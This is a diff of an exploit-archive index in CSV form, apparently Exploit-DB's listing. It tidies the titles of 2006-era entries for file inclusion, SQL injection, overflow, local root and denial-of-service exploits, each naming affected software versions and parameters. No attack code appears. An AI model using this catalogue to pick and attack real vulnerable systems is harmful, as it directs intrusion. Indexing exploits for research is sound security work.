2-0.93.94-4mdk (DEBUG_FILE) Local Root Exploit",2006-08-08,"Karol Wiesek",linux,local,0 -2145,platforms/hardware/remote/2145.txt,"Barracuda Spam Firewall <= 3.3.03.053 Remote Code Execution (extra)",2006-08-08,PATz,hardware,remote,0 +2145,platforms/hardware/remote/2145.txt,"Barracuda Spam Firewall <= 3.3.03.053 - Remote Code Execution (extra)",2006-08-08,PATz,hardware,remote,0 2146,platforms/php/webapps/2146.txt,"docpile:we <= 0.2.2 (INIT_PATH) Remote File Inclusion Vulnerabilities",2006-08-08,"Mehmet Ince",php,webapps,0 2147,platforms/windows/dos/2147.pl,"XChat <= 2.6.7 (win version) Remote Denial of Service Exploit (perl)",2006-08-08,Elo,windows,dos,0 2148,platforms/php/webapps/2148.txt,"phNNTP <= 1.3 (article-raw.php) Remote File Include Vulnerability",2006-08-08,Drago84,php,webapps,0 @@ -1850,11 +1850,11 @@ id,file,description,date,author,platform,type,port 2153,platforms/php/webapps/2153.txt,"Boite de News <= 4.0.1 (index.php) Remote File Inclusion Vulnerability",2006-08-09,"the master",php,webapps,0 2154,platforms/php/webapps/2154.txt,"PgMarket <= 2.2.3 (CFG[libdir]) Remote File Inclusion Vulnerability",2006-08-09,"Mehmet Ince",php,webapps,0 2155,platforms/php/webapps/2155.txt,"See-Commerce <= 1.0.625 (owimg.php3) Remote Include Vulnerability",2006-08-09,Drago84,php,webapps,0 -2156,platforms/hardware/dos/2156.c,"PocketPC MMS Composer (WAPPush) Denial of Service Exploit",2006-08-09,"Collin Mulliner",hardware,dos,0 +2156,platforms/hardware/dos/2156.c,"PocketPC Mms Composer (WAPPush) Denial of Service Exploit",2006-08-09,"Collin Mulliner",hardware,dos,0 2157,platforms/php/webapps/2157.txt,"Tagger Luxury Edition (BBCodeFile) Remote File Include Vulnerability",2006-08-09,Morgan,php,webapps,0 2158,platforms/php/webapps/2158.txt,"TinyWebGallery <= 1.5 (image) Remote Include Vulnerabilities",2006-08-09,"Mehmet Ince",php,webapps,0 2159,platforms/php/webapps/2159.pl,"PHPMyRing <= 4.2.0 (view_com.php) Remote SQL Injection Exploit",2006-08-09,simo64,php,webapps,0 -2160,platforms/windows/dos/2160.c,"OpenMPT <= 1.17.02.43 Multiple Remote Buffer Overflow Exploit PoC",2006-08-10,"Luigi Auriemma",windows,dos,0 +2160,platforms/windows/dos/2160.c,"OpenMPT <= 1.17.02.43 - Multiple Remote Buffer Overflow Exploit PoC",2006-08-10,"Luigi Auriemma",windows,dos,0 2161,platforms/php/webapps/2161.pl,"SAPID CMS <= 1.2.3_rc3 (rootpath) Remote Code Execution Exploit",2006-08-10,simo64,php,webapps,0 2162,platforms/windows/remote/2162.pm,"Microsoft Windows - NetpIsRemote() Remote Overflow Exploit (MS06-040)",2006-08-10,"H D Moore",windows,remote,445 2163,platforms/php/webapps/2163.txt,"phpwcms <= 1.1-RC4 (spaw) Remote File Include Vulnerability",2006-08-10,Morgan,php,webapps,0 @@ -1866,7 +1866,7 @@ id,file,description,date,author,platform,type,port 2169,platforms/php/webapps/2169.txt,"Chaussette <= 080706 (_BASE) Remote File Include Vulnerabilities",2006-08-10,Drago84,php,webapps,0 2170,platforms/php/webapps/2170.txt,"VWar <= 1.50 R14 (online.php) Remote SQL Injection Vulnerability",2006-08-10,brOmstar,php,webapps,0 2171,platforms/php/webapps/2171.txt,"WEBInsta MM 1.3e (cabsolute_path) Remote File Include Vulnerability",2006-08-10,"Philipp Niedziela",php,webapps,0 -2172,platforms/php/webapps/2172.txt,"Mambo Remository Component <= 3.25 Remote Include Vulnerability",2006-08-10,camino,php,webapps,0 +2172,platforms/php/webapps/2172.txt,"Mambo Remository Component <= 3.25 - Remote Include Vulnerability",2006-08-10,camino,php,webapps,0 2173,platforms/php/webapps/2173.txt,"MVCnPHP <= 3.0 glConf[path_libraries] Remote Include Vulnerabilities",2006-08-10,Drago84,php,webapps,0 2174,platforms/php/webapps/2174.txt,"Wheatblog <= 1.1 (session.php) Remote File Include Vulnerability",2006-08-11,O.U.T.L.A.W,php,webapps,0 2175,platforms/php/webapps/2175.txt,"WEBinsta CMS <= 0.3.1 (templates_dir) Remote File Include Exploit",2006-08-12,K-159,php,webapps,0 @@ -1902,7 +1902,7 @@ id,file,description,date,author,platform,type,port 2206,platforms/php/webapps/2206.txt,"Mambo phpShop Component <= 1.2 RC2b File Include Vulnerability",2006-08-17,Cmaster4,php,webapps,0 2207,platforms/php/webapps/2207.txt,"Mambo a6mambocredits Component 1.0.0 File Include Vulnerability",2006-08-17,Cmaster4,php,webapps,0 2208,platforms/windows/dos/2208.html,"Macromedia Flash 9 (IE Plugin) Remote Denial of Service Crash Exploit",2006-08-18,Mr.Niega,windows,dos,0 -2209,platforms/php/webapps/2209.txt,"Joomla Artlinks Component <= 1.0b4 Remote Include Vulnerability",2006-08-18,camino,php,webapps,0 +2209,platforms/php/webapps/2209.txt,"Joomla Artlinks Component <= 1.0b4 - Remote Include Vulnerability",2006-08-18,camino,php,webapps,0 2210,platforms/windows/dos/2210.c,"Microsoft Windows PNG File IHDR Block Denial of Service Exploit PoC (c) (2)",2006-08-18,vegas78,windows,dos,0 2211,platforms/php/webapps/2211.txt,"PHlyMail Lite <= 3.4.4 (mod.listmail.php) Remote Include Vulnerability",2006-08-18,Kacper,php,webapps,0 2212,platforms/php/webapps/2212.txt,"phpCodeGenie <= 3.0.2 (BEAUT_PATH) Remote File Include Vulnerability",2006-08-18,Kacper,php,webapps,0 @@ -1931,7 +1931,7 @@ id,file,description,date,author,platform,type,port 2235,platforms/php/webapps/2235.txt,"PHProjekt <= 6.1 (path_pre) Multiple Remote File Include Vulnerabilities",2006-08-21,"the master",php,webapps,0 2236,platforms/php/webapps/2236.txt,"PHlyMail Lite <= 3.4.4 (folderprops.php) Remote Include Vulnerability (2)",2006-08-21,Kw3[R]Ln,php,webapps,0 2237,platforms/multiple/dos/2237.sh,"Apache < 1.3.37 / 2.0.59 / 2.2.3 - (mod_rewrite) Remote Overflow PoC",2006-08-21,"Jacobo Avariento",multiple,dos,0 -2238,platforms/windows/dos/2238.html,"MS Internet Explorer Multiple COM Object Color Property DoS",2006-08-21,nop,windows,dos,0 +2238,platforms/windows/dos/2238.html,"Microsoft Internet Explorer Multiple COM Object Color Property DoS",2006-08-21,nop,windows,dos,0 2239,platforms/php/webapps/2239.txt,"Empire CMS <= 3.7 (checklevel.php) Remote File Include Vulnerability",2006-08-22,"Bob Linuson",php,webapps,0 2240,platforms/php/webapps/2240.txt,"HPE <= 1.0 (HPEinc) Remote File Include Vulnerabilities (updated)",2006-08-22,"the master",php,webapps,0 2241,platforms/solaris/local/2241.c,"Solaris 10 sysinfo(2) - Local Kernel Memory Disclosure Exploit",2006-08-22,"Marco Ivaldi",solaris,local,0 @@ -1956,7 +1956,7 @@ id,file,description,date,author,platform,type,port 2260,platforms/php/webapps/2260.pl,"AlberT-EasySite <= 1.0a5 (PSA_PATH) Remote File Include Exploit",2006-08-27,Kacper,php,webapps,0 2261,platforms/php/webapps/2261.php,"iziContents <= RC6 GLOBALS[] Remote Code Execution Exploit",2006-08-27,Kacper,php,webapps,0 2262,platforms/php/webapps/2262.php,"CMS Frogss <= 0.4 (podpis) Remote SQL Injection Exploit",2006-08-27,Kacper,php,webapps,0 -2263,platforms/php/webapps/2263.txt,"Ay System CMS <= 2.6 (main.php) Remote File Include Vulnerability",2006-08-27,SHiKaA,php,webapps,0 +2263,platforms/php/webapps/2263.txt,"Ay System CMS <= 2.6 - (main.php) Remote File Include Vulnerability",2006-08-27,SHiKaA,php,webapps,0 2264,platforms/windows/local/2264.htm,"VMware 5.5.1 (ActiveX) Local Buffer Overflow Exploit",2006-08-27,c0ntex,windows,local,0 2265,platforms/windows/remote/2265.c,"Microsoft Windows - NetpIsRemote() Remote Overflow Exploit (MS06-040) (2)",2006-08-28,ub3rst4r,windows,remote,445 2266,platforms/cgi/webapps/2266.txt,"Cybozu Products (id) Arbitrary File Retrieval Vulnerability",2006-08-28,"Tan Chew Keong",cgi,webapps,0 @@ -1995,7 +1995,7 @@ id,file,description,date,author,platform,type,port 2299,platforms/php/webapps/2299.php,"PHP Proxima <= 6 - completepack Remote Code Execution Exploit",2006-09-04,Kacper,php,webapps,0 2300,platforms/php/webapps/2300.pl,"SoftBB 0.1 (cmd) Remote Command Execution Exploit",2006-09-04,DarkFig,php,webapps,0 2301,platforms/php/webapps/2301.txt,"MySpeach <= 3.0.2 (my_ms[root]) Remote File Include Vulnerability",2006-09-05,SHiKaA,php,webapps,0 -2302,platforms/windows/dos/2302.pl,"J. River Media Center 11.0.309 Remote Denial of Service PoC",2006-09-05,n00b,windows,dos,0 +2302,platforms/windows/dos/2302.pl,"J. River Media Center 11.0.309 - Remote Denial of Service PoC",2006-09-05,n00b,windows,dos,0 2303,platforms/multiple/dos/2303.html,"dsock <= 1.3 (buf) Remote Buffer Overflow PoC",2006-09-05,DaveK,multiple,dos,0 2304,platforms/php/webapps/2304.txt,"GrapAgenda 0.1 (page) Remote File Include Vulnerability",2006-09-05,"Kurdish Security",php,webapps,0 2305,platforms/php/webapps/2305.txt,"AnnonceV News Script <= 1.1 (page) Remote File Include Vulnerability",2006-09-05,"Kurdish Security",php,webapps,0 @@ -2009,7 +2009,7 @@ id,file,description,date,author,platform,type,port 2313,platforms/php/webapps/2313.txt,"phpFullAnnu <= 5.1 (repmod) Remote File Include Vulnerability",2006-09-06,SHiKaA,php,webapps,0 2314,platforms/php/webapps/2314.txt,"Beautifier 0.1 (Core.php) Remote File Include Vulnerability",2006-09-06,"the master",php,webapps,0 2315,platforms/php/webapps/2315.txt,"Akarru <= 0.4.3.34 (bm_content) Remote File Include Vulnerability",2006-09-06,ddoshomo,php,webapps,0 -2316,platforms/php/webapps/2316.txt,"PayProCart <= 1146078425 Multiple Remote File Include Vulnerabilities",2006-09-07,momo26,php,webapps,0 +2316,platforms/php/webapps/2316.txt,"PayProCart <= 1146078425 - Multiple Remote File Include Vulnerabilities",2006-09-07,momo26,php,webapps,0 2317,platforms/php/webapps/2317.txt,"SL_Site <= 1.0 (spaw_root) Remote File Include Vulnerability",2006-09-07,Kw3[R]Ln,php,webapps,0 2318,platforms/php/webapps/2318.txt,"Web Server Creator 0.1 - (l) Remote Include Vulnerability",2006-09-07,"Mehmet Ince",php,webapps,0 2319,platforms/php/webapps/2319.txt,"Fire Soft Board <= RC 3 (racine) Remote File Include Vulnerability",2006-09-07,ddoshomo,php,webapps,0 @@ -2046,12 +2046,12 @@ id,file,description,date,author,platform,type,port 2350,platforms/php/webapps/2350.txt,"p4CMS <= 1.05 (abs_pfad) Remote File Include Vulnerability",2006-09-12,SHiKaA,php,webapps,0 2351,platforms/php/webapps/2351.txt,"Popper <= 1.41-r2 - (form) Remote File Include Vulnerability",2006-09-12,SHiKaA,php,webapps,0 2352,platforms/php/webapps/2352.txt,"webSPELL <= 4.01.01 Database Backup Download Vulnerability",2006-09-12,Trex,php,webapps,0 -2353,platforms/php/webapps/2353.txt,"Vitrax Pre-modded <= 1.0.6-r3 Remote File Include Vulnerability",2006-09-12,CeNGiZ-HaN,php,webapps,0 +2353,platforms/php/webapps/2353.txt,"Vitrax Pre-modded <= 1.0.6-r3 - Remote File Include Vulnerability",2006-09-12,CeNGiZ-HaN,php,webapps,0 2354,platforms/php/webapps/2354.txt,"Signkorn Guestbook <= 1.3 (dir_path) Remote File Include Vulnerability",2006-09-12,SHiKaA,php,webapps,0 2355,platforms/windows/remote/2355.pm,"Microsoft Windows 2003 - NetpIsRemote() Remote Overflow Exploit (MS06-040)",2006-09-13,"Trirat Puttaraksa",windows,remote,445 2356,platforms/php/webapps/2356.txt,"Quicksilver Forums <= 1.2.1 (set) Remote File Include Vulnerability",2006-09-13,mdx,php,webapps,0 2357,platforms/php/webapps/2357.txt,"phpunity.postcard (gallery_path) Remote File Include Vulnerability",2006-09-13,Rivertam,php,webapps,0 -2358,platforms/windows/remote/2358.c,"MS Internet Explorer COM Object Remote Heap Overflow Exploit",2006-09-13,nop,windows,remote,0 +2358,platforms/windows/remote/2358.c,"Microsoft Internet Explorer COM Object Remote Heap Overflow Exploit",2006-09-13,nop,windows,remote,0 2359,platforms/php/webapps/2359.txt,"Downstat <= 1.8 (art) Remote File Include Vulnerability",2006-09-13,SilenZ,php,webapps,0 2360,platforms/solaris/local/2360.c,"X11R6 <= 6.4 XKEYBOARD - Local Buffer Overflow Exploit (solaris/sparc)",2006-09-13,"Marco Ivaldi",solaris,local,0 2361,platforms/php/webapps/2361.txt,"Shadowed Portal <= 5.599 (root) Remote File Include Vulnerability",2006-09-13,mad_hacker,php,webapps,0 @@ -2076,13 +2076,13 @@ id,file,description,date,author,platform,type,port 2380,platforms/php/webapps/2380.txt,"UNAK-CMS <= 1.5 (dirroot) Remote File Include Vulnerabilities",2006-09-16,SHiKaA,php,webapps,0 2381,platforms/php/webapps/2381.txt,"guanxiCRM Business Solution <= 0.9.1 - Remote File Include Vulnerability",2006-09-16,SHiKaA,php,webapps,0 2382,platforms/php/webapps/2382.pl,"Zix Forum <= 1.12 (RepId) Remote SQL Injection Exploit",2006-09-17,SlimTim10,php,webapps,0 -2383,platforms/php/webapps/2383.txt,"MobilePublisherPHP <= 1.5 RC2 Remote File Include Vulnerability",2006-09-17,Timq,php,webapps,0 +2383,platforms/php/webapps/2383.txt,"MobilePublisherPHP <= 1.5 RC2 - Remote File Include Vulnerability",2006-09-17,Timq,php,webapps,0 2384,platforms/asp/webapps/2384.txt,"Q-Shop 3.5 (browse.asp) Remote SQL Injection Vulnerability",2006-09-17,ajann,asp,webapps,0 2385,platforms/asp/webapps/2385.txt,"Techno Dreams FAQ Manager 1.0 - Remote SQL Injection Vulnerability",2006-09-17,ajann,asp,webapps,0 2386,platforms/asp/webapps/2386.txt,"Techno Dreams Articles & Papers 2.0 - Remote SQL Injection Vulnerability",2006-09-17,ajann,asp,webapps,0 2387,platforms/asp/webapps/2387.txt,"Charon Cart 3.0 - (Review.asp) Remote SQL Injection Vulnerability",2006-09-17,ajann,asp,webapps,0 2388,platforms/php/webapps/2388.txt,"CMtextS <= 1.0 (users_logins/admin.txt) Credentials Disclosure Vuln",2006-09-17,Kacper,php,webapps,0 -2389,platforms/php/webapps/2389.pl,"AlstraSoft E-Friends <= 4.85 Remote Command Execution Exploit",2006-09-18,Kw3[R]Ln,php,webapps,0 +2389,platforms/php/webapps/2389.pl,"AlstraSoft E-Friends <= 4.85 - Remote Command Execution Exploit",2006-09-18,Kw3[R]Ln,php,webapps,0 2390,platforms/php/webapps/2390.txt,"PNphpBB2 <= 1.2g - (phpbb_root_path) Remote File Include Vulnerability",2006-09-18,AzzCoder,php,webapps,0 2391,platforms/php/webapps/2391.php,"Exponent CMS <= 0.96.3 (view) Remote Command Execution Exploit",2006-09-19,rgod,php,webapps,0 2392,platforms/php/webapps/2392.txt,"Pie Cart Pro (Home_Path) Remote File Include Vulnerability",2006-09-19,"Saudi Hackrz",php,webapps,0 @@ -2091,17 +2091,17 @@ id,file,description,date,author,platform,type,port 2395,platforms/asp/webapps/2395.txt,"Tekman Portal 1.0 (tr) Remote SQL Injection Vulnerability",2006-09-19,"Fix TR",asp,webapps,0 2396,platforms/php/webapps/2396.txt,"Simple Discussion Board 0.1.0 - Remote File Include Vulnerability",2006-09-19,CeNGiZ-HaN,php,webapps,0 2397,platforms/php/webapps/2397.py,"MyReview 1.9.4 (email) Remote SQL Injection / Code Execution Exploit",2006-09-19,STILPU,php,webapps,0 -2398,platforms/php/webapps/2398.txt,"Digital WebShop <= 1.128 Multiple Remote File Include Vulnerabilities",2006-09-19,ajann,php,webapps,0 +2398,platforms/php/webapps/2398.txt,"Digital WebShop <= 1.128 - Multiple Remote File Include Vulnerabilities",2006-09-19,ajann,php,webapps,0 2399,platforms/php/webapps/2399.txt,"BCWB <= 0.99 (root_path) Remote File Include Vulnerability",2006-09-19,ajann,php,webapps,0 -2400,platforms/windows/dos/2400.html,"MS Internet Explorer (VML) Remote Denial of Service Exploit PoC",2006-09-19,Shirkdog,windows,dos,0 +2400,platforms/windows/dos/2400.html,"Microsoft Internet Explorer (VML) Remote Denial of Service Exploit PoC",2006-09-19,Shirkdog,windows,dos,0 2401,platforms/windows/remote/2401.c,"WS_FTP LE 5.08 (PASV response) Remote Buffer Overflow Exploit",2006-09-20,h07,windows,remote,0 2402,platforms/php/webapps/2402.php,"Php Blue Dragon CMS <= 2.9.1 (XSS/SQL) Code Execution Exploit",2006-09-20,Kacper,php,webapps,0 -2403,platforms/windows/remote/2403.c,"MS Internet Explorer (VML) Remote Buffer Overflow Exploit",2006-09-20,nop,windows,remote,0 +2403,platforms/windows/remote/2403.c,"Microsoft Internet Explorer (VML) Remote Buffer Overflow Exploit",2006-09-20,nop,windows,remote,0 2404,platforms/linux/local/2404.c,"Dr.Web Antivirus 4.33 (LHA long directory name) Local Overflow Exploit",2006-09-20,Guay-Leroux,linux,local,0 2405,platforms/php/webapps/2405.txt,"AllMyGuests <= 0.4.1 (cfg_serverpath) Remote File Include Vulnerability",2006-09-20,Br@Him,php,webapps,0 2406,platforms/php/webapps/2406.php,"exV2 <= 2.0.4.3 - (sort) Remote SQL Injection Exploit",2006-09-21,rgod,php,webapps,0 2407,platforms/php/webapps/2407.txt,"pNews <= 1.1.0 (nbs) Remote File Include Vulnerability",2006-09-21,CvIr.System,php,webapps,0 -2408,platforms/windows/remote/2408.pl,"MS Internet Explorer (VML) Remote Buffer Overflow Exploit (XP SP1)",2006-09-21,"Trirat Puttaraksa",windows,remote,0 +2408,platforms/windows/remote/2408.pl,"Microsoft Internet Explorer (VML) Remote Buffer Overflow Exploit (XP SP1)",2006-09-21,"Trirat Puttaraksa",windows,remote,0 2409,platforms/php/webapps/2409.txt,"PHPartenaire 1.0 (dix.php3) Remote File Include Vulnerability",2006-09-21,DaDIsS,php,webapps,0 2410,platforms/php/webapps/2410.txt,"phpQuestionnaire 3.12 (phpQRootDir) Remote File Include Vulnerability",2006-09-21,Solpot,php,webapps,0 2411,platforms/php/webapps/2411.pl,"ProgSys <= 0.156 (RR.php) Remote File Include Exploit",2006-09-21,Kacper,php,webapps,0 @@ -2118,8 +2118,8 @@ id,file,description,date,author,platform,type,port 2422,platforms/php/webapps/2422.txt,"Advaced-Clan-Script <= 3.4 (mcf.php) Remote File Include Vulnerability",2006-09-24,xdh,php,webapps,0 2423,platforms/asp/webapps/2423.txt,"iyzi Forum <= 1.0 Beta 3 (uye_ayrinti.asp) Remote SQL Injection",2006-09-24,"Fix TR",asp,webapps,0 2424,platforms/php/webapps/2424.txt,"SyntaxCMS <= 1.3 (0004_init_urls.php) Remote File Include Vulnerability",2006-09-24,MoHaJaLi,php,webapps,0 -2425,platforms/windows/remote/2425.html,"MS Internet Explorer (VML) Remote Buffer Overflow Exploit (XP SP2)",2006-09-24,jamikazu,windows,remote,0 -2426,platforms/windows/remote/2426.pl,"MS Internet Explorer (VML) Remote Buffer Overflow Exploit (SP2) (pl)",2006-09-25,"Trirat Puttaraksa",windows,remote,0 +2425,platforms/windows/remote/2425.html,"Microsoft Internet Explorer (VML) Remote Buffer Overflow Exploit (XP SP2)",2006-09-24,jamikazu,windows,remote,0 +2426,platforms/windows/remote/2426.pl,"Microsoft Internet Explorer (VML) Remote Buffer Overflow Exploit (SP2) (pl)",2006-09-25,"Trirat Puttaraksa",windows,remote,0 2427,platforms/php/webapps/2427.txt,"Polaring <= 0.04.03 (general.php) Remote File Include Vulnerability",2006-09-25,Drago84,php,webapps,0 2428,platforms/php/webapps/2428.txt,"PBLang <= 4.66z (temppath) Remote File Include Vulnerability",2006-09-25,SHiKaA,php,webapps,0 2429,platforms/php/webapps/2429.txt,"Minerva <= 2.0.21 build 238a (phpbb_root_path) File Include Vulnerability",2006-09-25,SHiKaA,php,webapps,0 @@ -2132,7 +2132,7 @@ id,file,description,date,author,platform,type,port 2437,platforms/php/webapps/2437.php,"paBugs <= 2.0 Beta 3 (class.mysql.php) Remote File Include Exploit",2006-09-26,Kacper,php,webapps,0 2438,platforms/php/webapps/2438.txt,"Kietu? <= 4.0.0b2 (hit.php) Remote File Include Vulnerability",2006-09-26,D_7J,php,webapps,0 2439,platforms/php/webapps/2439.txt,"Newswriter SW <= 1.42 (editfunc.inc.php) File Include Vulnerability",2006-09-27,"Silahsiz Kuvvetler",php,webapps,0 -2440,platforms/windows/remote/2440.rb,"MS Internet Explorer WebViewFolderIcon setSlice() Overflow Exploit",2006-09-27,"H D Moore",windows,remote,0 +2440,platforms/windows/remote/2440.rb,"Microsoft Internet Explorer WebViewFolderIcon setSlice() Overflow Exploit",2006-09-27,"H D Moore",windows,remote,0 2441,platforms/php/webapps/2441.pl,"Blog Pixel Motion 2.1.1 PHP Code Execution / Create Admin Exploit",2006-09-27,DarkFig,php,webapps,0 2442,platforms/php/webapps/2442.txt,"A-Blog 2.0 - Multiple Remote File Include Vulnerabilities",2006-09-27,v1per-haCker,php,webapps,0 2443,platforms/php/webapps/2443.txt,"Newswriter SW 1.4.2 (main.inc.php) Remote File Include Exploit",2006-09-27,"Mehmet Ince",php,webapps,0 @@ -2140,7 +2140,7 @@ id,file,description,date,author,platform,type,port 2445,platforms/windows/remote/2445.c,"NaviCOPA Web Server 2.01 (GET) Remote Buffer Overflow Exploit",2006-09-27,h07,windows,remote,80 2446,platforms/php/webapps/2446.php,"PPA Gallery <= 1.0 (functions.inc.php) Remote File Include Exploit",2006-09-28,Kacper,php,webapps,0 2447,platforms/php/webapps/2447.php,"KGB 1.87 (Local Inclusion) Remote Code Execution Exploit",2006-09-28,Kacper,php,webapps,0 -2448,platforms/windows/remote/2448.html,"MS Internet Explorer WebViewFolderIcon setSlice() Exploit (html)",2006-09-28,jamikazu,windows,remote,0 +2448,platforms/windows/remote/2448.html,"Microsoft Internet Explorer WebViewFolderIcon setSlice() Exploit (html)",2006-09-28,jamikazu,windows,remote,0 2449,platforms/php/webapps/2449.txt,"Les Visiteurs (Visitors) <= 2.0 (config.inc.php) File Include Vulnerability",2006-09-28,D_7J,php,webapps,0 2450,platforms/php/webapps/2450.txt,"TagIt! Tagboard <= 2.1.b b2 (index.php) Remote File Include Vulnerability",2006-09-28,Kernel-32,php,webapps,0 2451,platforms/php/webapps/2451.txt,"phpMyWebmin 1.0 (window.php) Remote File Include Vulnerability",2006-09-28,Kernel-32,php,webapps,0 @@ -2150,15 +2150,15 @@ id,file,description,date,author,platform,type,port 2455,platforms/php/webapps/2455.php,"VideoDB <= 2.2.1 (pdf.php) Remote File Include Exploit",2006-09-29,Kacper,php,webapps,0 2456,platforms/php/webapps/2456.php,"PHP Krazy Image Hosting 0.7a (display.php) SQL Injection Exploit",2006-09-29,Trex,php,webapps,0 2457,platforms/php/webapps/2457.php,"UBB.threads <= 6.5.1.1 (doeditconfig.php) Code Execution Exploit",2006-09-29,"HACKERS PAL",php,webapps,0 -2458,platforms/windows/remote/2458.pl,"MS Internet Explorer WebViewFolderIcon setSlice() Exploit (pl)",2006-09-29,"YAG KOHHA",windows,remote,0 +2458,platforms/windows/remote/2458.pl,"Microsoft Internet Explorer WebViewFolderIcon setSlice() Exploit (pl)",2006-09-29,"YAG KOHHA",windows,remote,0 2459,platforms/php/webapps/2459.txt,"Forum82 <= 2.5.2b - (repertorylevel) Multiple File Include Vulnerabilities",2006-09-29,"Silahsiz Kuvvetler",php,webapps,0 -2460,platforms/windows/remote/2460.c,"MS Internet Explorer WebViewFolderIcon setSlice() Exploit (c)",2006-09-29,LukeHack,windows,remote,0 +2460,platforms/windows/remote/2460.c,"Microsoft Internet Explorer WebViewFolderIcon setSlice() Exploit (c)",2006-09-29,LukeHack,windows,remote,0 2461,platforms/php/webapps/2461.txt,"VAMP Webmail <= 2.0beta1 (yesno.phtml) Remote Include Vulnerability",2006-09-30,Drago84,php,webapps,0 2462,platforms/php/webapps/2462.txt,"phpMyWebmin <= 1.0 (target) Remote File Include Vulnerabilities",2006-09-30,"Mehmet Ince",php,webapps,0 2463,platforms/osx/local/2463.c,"Mac OS X <= 10.4.7 Mach Exception Handling Local Root Exploit",2006-09-30,xmath,osx,local,0 2464,platforms/osx/local/2464.pl,"Mac OS X <= 10.4.7 - Mach Exception Handling Local Exploit (10.3.x 0day)",2006-09-30,"Kevin Finisterre",osx,local,0 2465,platforms/php/webapps/2465.php,"BasiliX 1.1.1 (BSX_LIBDIR) Remote File Include Exploit",2006-10-01,Kacper,php,webapps,0 -2466,platforms/linux/local/2466.pl,"cPanel <= 10.8.x (cpwrap via mysqladmin) Local Root Exploit",2006-10-01,"Clint Torrez",linux,local,0 +2466,platforms/linux/local/2466.pl,"cPanel <= 10.8.x - (cpwrap via mysqladmin) Local Root Exploit",2006-10-01,"Clint Torrez",linux,local,0 2467,platforms/windows/remote/2467.pm,"McAfee ePo 3.5.0 / ProtectionPilot 1.1.0 - (Source) Remote Exploit",2006-10-01,muts,windows,remote,81 2468,platforms/php/webapps/2468.txt,"BBaCE <= 3.5 (includes/functions.php) Remote File Include Vulnerability",2006-10-02,SpiderZ,php,webapps,0 2469,platforms/php/webapps/2469.pl,"JAF CMS <= 4.0 RC1 (forum.php) Remote File Include Exploit",2006-10-03,Kacper,php,webapps,0 @@ -2166,7 +2166,7 @@ id,file,description,date,author,platform,type,port 2471,platforms/php/webapps/2471.pl,"Travelsized CMS <= 0.4 (frontpage.php) Remote File Include Exploit",2006-10-03,Kacper,php,webapps,0 2472,platforms/php/webapps/2472.pl,"Klinza Professional CMS <= 5.0.1 (show_hlp.php) File Include Exploit",2006-10-03,Kacper,php,webapps,0 2473,platforms/php/webapps/2473.c,"Invision Gallery <= 2.0.7 ReadFile() & SQL Injection Exploit",2006-10-03,1nf3ct0r,php,webapps,0 -2474,platforms/php/webapps/2474.txt,"JAF CMS <= 4.0 RC1 Multiple Remote File Include Vulnerabilities",2006-10-04,"ThE TiGeR",php,webapps,0 +2474,platforms/php/webapps/2474.txt,"JAF CMS <= 4.0 RC1 - Multiple Remote File Include Vulnerabilities",2006-10-04,"ThE TiGeR",php,webapps,0 2475,platforms/php/webapps/2475.txt,"phpBB Admin Topic Action Logging Mod <= 0.94b File Include Vuln",2006-10-04,SpiderZ,php,webapps,0 2476,platforms/php/webapps/2476.txt,"phpGreetz <= 0.99 (footer.php) Remote File Include Vulnerability",2006-10-04,mozi,php,webapps,0 2477,platforms/php/webapps/2477.txt,"phpBB Static Topics <= 1.0 [phpbb_root_path] File Include Vulnerability",2006-10-04,Kw3[R]Ln,php,webapps,0 @@ -2179,7 +2179,7 @@ id,file,description,date,author,platform,type,port 2484,platforms/php/webapps/2484.txt,"FreeForum <= 0.9.7 (forum.php) Remote File Include Vulnerability",2006-10-07,"Mehmet Ince",php,webapps,0 2485,platforms/php/webapps/2485.pl,"Cahier de texte 2.0 (lire.php) Remote SQL Injection Exploit",2006-10-07,s4mi,php,webapps,0 2486,platforms/php/webapps/2486.txt,"phpBB Random User Registration Number 1.0 Mod Inclusion Vulnerability",2006-10-07,bd0rk,php,webapps,0 -2487,platforms/php/webapps/2487.php,"4images 1.7.x (search.php) Remote SQL Injection Exploit",2006-10-08,Synsta,php,webapps,0 +2487,platforms/php/webapps/2487.php,"4images 1.7.x - (search.php) Remote SQL Injection Exploit",2006-10-08,Synsta,php,webapps,0 2488,platforms/php/webapps/2488.txt,"PHPMyNews <= 1.4 (cfg_include_dir) Remote File Include Vulnerabilities",2006-10-08,"Mehmet Ince",php,webapps,0 2489,platforms/php/webapps/2489.pl,"Ciamos CMS <= 0.9.6b (config.php) Remote File Include Exploit",2006-10-08,Kacper,php,webapps,0 2490,platforms/php/webapps/2490.txt,"Freenews <= 1.1 (moteur.php) Remote File Include Vulnerability",2006-10-08,"Mehmet Ince",php,webapps,0 @@ -2222,7 +2222,7 @@ id,file,description,date,author,platform,type,port 2527,platforms/php/webapps/2527.c,"Invision Gallery <= 2.0.7 ReadFile() & SQL Injection Exploit (linux)",2006-10-12,ShadOS,php,webapps,0 2528,platforms/php/webapps/2528.txt,"miniBB keyword_replacer <= 1.0 (pathToFiles) File Include Vulnerability",2006-10-12,Kw3[R]Ln,php,webapps,0 2529,platforms/php/webapps/2529.txt,"AFGB GUESTBOOK 2.2 (Htmls) Remote File Include Vulnerabilities",2006-10-12,mdx,php,webapps,0 -2530,platforms/windows/remote/2530.py,"BulletProof FTP Client 2.45 Remote Buffer Overflow Exploit (PoC)",2006-10-12,h07,windows,remote,0 +2530,platforms/windows/remote/2530.py,"BulletProof FTP Client 2.45 - Remote Buffer Overflow Exploit (PoC)",2006-10-12,h07,windows,remote,0 2531,platforms/php/webapps/2531.txt,"phpBB Import Tools Mod <= 0.1.4 - Remote File Include Vulnerability",2006-10-12,boecke,php,webapps,0 2532,platforms/php/webapps/2532.txt,"phpBB Ajax Shoutbox <= 0.0.5 - Remote File Include Vulnerability",2006-10-12,boecke,php,webapps,0 2533,platforms/php/webapps/2533.txt,"phpBB SpamBlocker Mod <= 1.0.2 - Remote File Include Exploit",2006-10-12,"Nima Salehi",php,webapps,0 @@ -2246,7 +2246,7 @@ id,file,description,date,author,platform,type,port 2551,platforms/php/webapps/2551.txt,"phpBB ACP User Registration Mod 1.0 File Inclusion Vulnerability",2006-10-13,bd0rk,php,webapps,0 2552,platforms/php/webapps/2552.pl,"phpBB Security <= 1.0.1 (php_security.php) Remote File Include Exploit",2006-10-13,"Nima Salehi",php,webapps,0 2553,platforms/php/webapps/2553.txt,"YaBBSM 3.0.0 (Offline.php) Remote File Include Vulnerability",2006-10-13,SilenZ,php,webapps,0 -2554,platforms/php/webapps/2554.php,"cPanel <= 10.8.x (cpwrap via mysqladmin) Local Root Exploit (php)",2006-10-13,"Nima Salehi",php,webapps,0 